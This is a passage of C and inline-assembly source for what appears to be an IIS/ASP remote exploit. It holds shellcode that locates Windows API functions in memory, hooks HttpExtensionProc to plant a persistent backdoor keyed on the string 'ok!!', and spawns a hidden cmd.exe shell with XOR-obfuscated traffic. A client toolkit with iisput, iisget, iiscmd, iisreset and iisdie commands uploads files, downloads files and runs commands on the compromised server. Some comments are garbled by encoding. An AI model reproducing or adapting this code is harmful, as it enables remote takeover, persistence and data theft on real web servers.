al,ah // lea eax,ptr word [edx*4+al] stosb jmp looplock next1: call getediadd next2: call getshelladd shell: NOP NOP NOP NOP NOP NOP NOP NOP } } void shellcodefn(char *ecb) { char Buff[SHELLBUFFSIZE+2]; int *except[3]; FARPROC memcpyadd; FARPROC msvcrtdlladd; FARPROC HttpExtensionProcadd; FARPROC Aspdlladd; FARPROC RtlEnterCriticalSectionadd; FARPROC Ntdlladd; FARPROC Sleepadd; FARPROC GetLastErroradd; FARPROC GetFileSizeadd; FARPROC CreateFileAadd; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; FARPROC writeclient; FARPROC readclient; HCONN ConnID; FARPROC shellcodefnadd=ecb; char *stradd,*stradd2,*dooradd; int imgbase,fnbase,i,k,l,thedoor; HANDLE libhandle; int fpt; //libwsock32; STARTUPINFO siinfo; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; int lBytesRead; int lockintvar1,lockintvar2; char lockcharvar; int shelllocknum; // unsigned char temp; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor') { k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } //����KERNEL32��DLLģ���ַ��API���� GetProcAddress��ַ //ע�������������ҳ�治����� if(procgetadd==0) goto die ; i=stradd; for(k=1;*stradd!=0;++k) { if(*stradd==0x9) libhandle=procloadlib(stradd+1); else apifnadd[k]=procgetadd(libhandle,stradd); for(;*stradd!=0;++stradd){ } ++stradd; } ++stradd; k=0x7ffdf020; *(int *)k=RtlEnterCriticalSectionadd; k=stradd; stradd=i; thedoor=0; i=0; _asm{ jmp getdoorcall getdooradd: pop dooradd; mov l,esp call getexceptretadd } if(i==0){ ++i; if(*(int *)ecb==0x90){ if(*(int *)(*(int *)(ecb+0x64))=='ok!!') { i=0; thedoor=1; } } } if(i!=0){ *(int *)(dooradd-0x0c)=HttpExtensionProcadd; *(int *)(dooradd-0x13)=shellcodefnadd; ecb=0; _asm{ call getexceptretadd } i=ecb; i&=0xfffff000; ecb=i; ecb+=0x1000; for(;i<l;++i,++ecb) { if(*(int *)ecb==0x90){ if(*(int *)(ecb+8)==(int *)ecb){ if(*(int *)*(int *)(ecb+0x64)=='ok!!') break; } } } i=0; _asm{ call getexceptretadd } i&=0xfffff000; i+=0x1000; for(;i<l;++i){ if(*(int *)i==HttpExtensionProcadd){ *(int *)i=dooradd-7; // break; } } // *(int *)(dooradd-0x0c)=HttpExtensionProcadd; } writeclient= *(int *)(ecb+0x84); readclient = *(int *)(ecb+0x88); ConnID = *(int *)(ecb+8) ; stradd=k; _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(thedoor==0){ _asm{ mov eax,0xffffffff mov dword ptr fs:[0],eax } } stradd2=stradd; stradd+=8; k=0x20; writeclient(ConnID,*(int *)(ecb+0x6c),&k,0); k=8; writeclient(ConnID,stradd+9,&k,0); // Sleepadd(100); shelllocknum=LOCKBIGNUM2; if(*(int *)*(int *)(ecb+0x64)=='ok!!'&&*(int *)(*(int *)(ecb+0x64)+4)=='notx') shelllocknum=0; // iiscmd: lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; iiscmd: /* lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; */ sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); // ZeroMemory(&siinfo,sizeof(siinfo)); _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; k=0; // while(k==0) // { k=CreateProcessadd(NULL,stradd2,NULL,NULL,1,0,NULL,NULL,&siinfo, &ProcessInformation); // stradd+=8; // } Sleepadd(200); // PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0 ); i=0; while(1) { PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0); if(lBytesRead>0) { i=0; ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) { for(k=0;k<lBytesRead;++k){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[k]^=lockcharvar; // DATAXORCODE; // Buff[k]^=DATAXORCODE; } writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); // Sleepadd(20); } } else{ // Sleepadd(10); l=0; if(i<50){ l=1; ++i; k=1; lBytesRead=0; } while(l==0){ i=0; lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); for(l=0;l<lBytesRead;++l){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[l]^=lockcharvar; // DATAXORCODE; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu ff[2]=='s'&&Buff[3]=='c'&&Buff[4]==' '){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe stradd2=Buff+5; Buff[lBytesRead]=0; goto iiscmd; } if(k==1&&lBytesRead>=5&&Buff[0]=='r'&&Buff[1]=='e'&&Bu ff[2]=='s'&&Buff[3]=='e'&&Buff[4]=='t'){ lBytesRead=0x0c; writeclient(ConnID,stradd+0x11,&lBytesRead,0); lockintvar1=shelllocknum%LOCKBIGNUM; lockintvar2=lockintvar1; lBytesRead=0; } if(k==1&&lBytesRead>=5&&Buff[0]=='i'&&Buff[1]=='i'&&Bu ff[2]=='s'&&Buff[3]=='r'&&Buff[4]=='r'){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe *(int *)(dooradd-0x0c)=0; Sleepadd(0x7fffffff); _asm{ mov eax,0 mov esp,0 jmp eax } } if(k==1&&lBytesRead>4&&Buff[0]=='p'&&Buff[1]=='u'&&Buff[2]=='t'&&Buff[3] ==' ') { l=*(int *)(Buff+4); // WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); fpt=CreateFileAadd(Buff+0x8,FILE_FLAG_WRITE_THROUGH+ GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0 ); k=GetLastErroradd(); i=0; while(l>0){ lBytesRead=SHELLBUFFSIZE; k=readclient(ConnID,Buff,&lBytesRead); if(k==1){ if(lBytesRead>0){ for(k=0;k<lBytesRead;++k){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; Buff[k]^=lockcharvar; // DATAXORCODE; } l-=lBytesRead; // if(fpt>0) WriteFileadd(fpt,Buff,lBytesRead,&lBytesRead,NULL); // else Sleepadd(010); } // if(i>100) l=0; } else { Sleepadd(0100); ++i; } if(i>10000) l=0; } CloseHandleadd(fpt); l=0; } else{ if(k==1&&lBytesRead>4&&Buff[0]=='g'&&Buff[1]=='e'&&Buff[2]=='t'&&Buff[3] ==' '){ // fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTIN G,FILE_ATTRIBUTE_NORMAL,0); fpt=CreateFileAadd(Buff+4,GENERIC_READ,FILE_SHARE_READ+FILE_SHARE_WRITE, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0); Sleepadd(100); l=GetFileSizeadd(fpt,&k); *(int *)Buff='ezis'; //size *(int *)(Buff+4)=l; lBytesRead=8; for(i=0;i<lBytesRead;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; // DATAXORCODE; } writeclient(ConnID,Buff,&lBytesRead,0); // HSE_IO_SYNC); // Sleepadd(100); i=0; while(l>0){ k=SHELLBUFFSIZE; ReadFileadd(fpt,Buff,k,&k,0); if(k>0){ for(i=0;i<k;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM ; lockcharvar=lockintvar2%0x100; Buff[i]^=lockcharvar; // DATAXORCODE; } i=0; l-=k; writeclient(ConnID,Buff,&k,0); // HSE_IO_SYNC); // Sleepadd(100); // k=readclient(ConnID,Buff,&lBytesRead); } else ++i; if(i>100) l=0; } CloseHandleadd(fpt); l=0; } else l=1; } } if(k!=1){ k=8; WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe WriteFileadd(hWritePipe2,stradd,k,&k,0); // exit cmd.exe k=GetLastErroradd(); while(k==0x2746){ if(thedoor==1) goto asmreturn; Sleepadd(0x7fffffff); //���� } } else{ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); // Sleepadd(1000); } } } die: goto die ; _asm{ asmreturn: mov eax,HSE_STATUS_SUCCESS leave ret 04 door: push eax mov eax,[esp+0x08] mov eax,[eax+0x64] mov eax,[eax] cmp eax,'ok!!' jnz jmpold pop eax push 0x12345678 //dooradd-0x13 ret jmpold: pop eax push 0x12345678 //dooradd-0xc ret //1 jmp door //2 getdoorcall: call getdooradd //5 getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 //stradd-0xe xor eax,eax //2 ret //1 execptprogram: jmp errprogram //2 bytes stradd-7 nextcall: call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } void iisput(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i<j;++i,++str){ if(*str!=' '){ filename=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i<j;++i,++str){ if(*str!=' '){ filename2=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisput filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin put file:%s",filename); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0); filesize=GetFileSize(fpt,&filesizehigh); strcpy(buff,"put "); *(int *)(buff+4)=filesize; filesize=*(int *)(buff+4); strcpy(buff+0x8,filename2); newsend(fd,buff,i+0x9,0); printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize); Sleep(1000); while(filesize>0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ filesize-=size; newsend(fd,buff,size,0); // Sleep(0100); } } // size=filesize; // ReadFile(fpt,buff,size,&size,NULL); // if(size>0) send(fd,buff,size,0); CloseHandle(fpt); j=1; ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n"); Sleep(1000); } void iisget(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i<j;++i,++str){ if(*str!=' '){ filename=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i<j;++i,++str){ if(*str!=' '){ filename2=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisget filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin get file:%s",filename); fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHAR E_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); strcpy(buff,"get "); strcpy(buff+0x4,filename2); newsend(fd,buff,i+0x5,0); printf("\n get file:%s from file:%s",filename,filename2); j=0; ioctlsocket(fd, FIONBIO, &j); i=0; filesize=0; j=0; while(j<100){ // Sleep(100); i=newrecv(fd,buff,0x800,0); if(i>0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=*(int *)(buff+4); j=100; } else { /* for(j=0;j<i;++j){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[j]^=lockcharvar; // DATAXORCODE; } */ j=0; printf("\n recv %s",buff); } } else ++j; // if(j>1000) i=0; } printf("\n file %d bytes %d\n",filesize,i); if(i>8){ i-=8; filesize-=i; WriteFile(fpt,buff+8,i,&i,NULL); } while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ filesize-=size; WriteFile(fpt,buff,size,&size,NULL); } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } } CloseHandle(fpt); printf("\n get file ok!\n"); j=1; ioctlsocket(fd, FIONBIO, &j); } void iisreset(int fd,char *str){ char buff[0x2000]; int i,j; printf("\nreset xor data.\n"); Sleep(1000); j=0; ioctlsocket(fd, FIONBIO, &j); strcpy(buff,"reset"); newsend(fd,buff,strlen(buff),0); Sleep(1000); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ j=recv(fd,buff,0x2000,0); if(j>0){ buff[j]=0; for(i=0;i<j;++i){ if(buff[i]==0) buff[i]='b'; } // printf("\nrecv 0x%x bytes:%s",j,buff); if(strstr(buff,"xordatareset")!=0){ printf("\nxor data reset ok.\n"); for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } break; } } // else if(j==0) break; // strcpy(buff,"\r\nmkdir d:\\test6\r\n"); // newsend(fd,buff,strlen(buff),0); } Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); // printf("aaa"); } void iisdie(int fd,char *str){ char buff[0x200]; int j; printf("\niis die.\n"); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); strcpy(buff,"iisrr "); newsend(fd,buff,strlen(buff),0); Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; } void iiscmd(int fd,char *str){ char *cmd="\0"; char buff[2000]; int i,j; j=strlen(str); for(i=0;i<j;++i,++str){ if(*str!=' '){ cmd=str; break; } } j=strlen(str); for(i=0;i<j;++i){ if(*(str+j-i-1)!=' ') { break; } else *(str+j-i-1)=0; } if(cmd=="\x0") { printf("\niiscmd cmd\n"); return; } printf("\nbegin run cmd:%s",cmd); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); strcpy(buff,"iisc "); strcat(buff,cmd); newsend(fd,buff,strlen(buff),0); Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); /* lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; */ } int newrecv(int fd,char *buff,int size,int flag){ int i,k; k=recv(fd,buff,size,flag); if(xordatabegin==1){ for(i=0;i<k;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } else{ if(k>0){ buff[k]=0; if(strstr(buff,"XORDATA")!=0) { xordatabegin=1; for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } } } return(k); } int newsend(int fd,char *buff,int size,int flag){ int i; for(i=0;i<size;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; // DATAXORCODE; // buff[i]^=DATAXORCODE; } return(send(fd,buff,size,flag)); } void iishelp(){ printf("\nusage:"); printf("\niisget filename filename. get file from web server."); printf("\niisput filename filename. put file to web server."); printf("\niiscmd cmd. run cmd on web server."); printf("\niisreset. reset the xor data."); printf("\niisdie. reset the asp door."); printf("\n\n"); }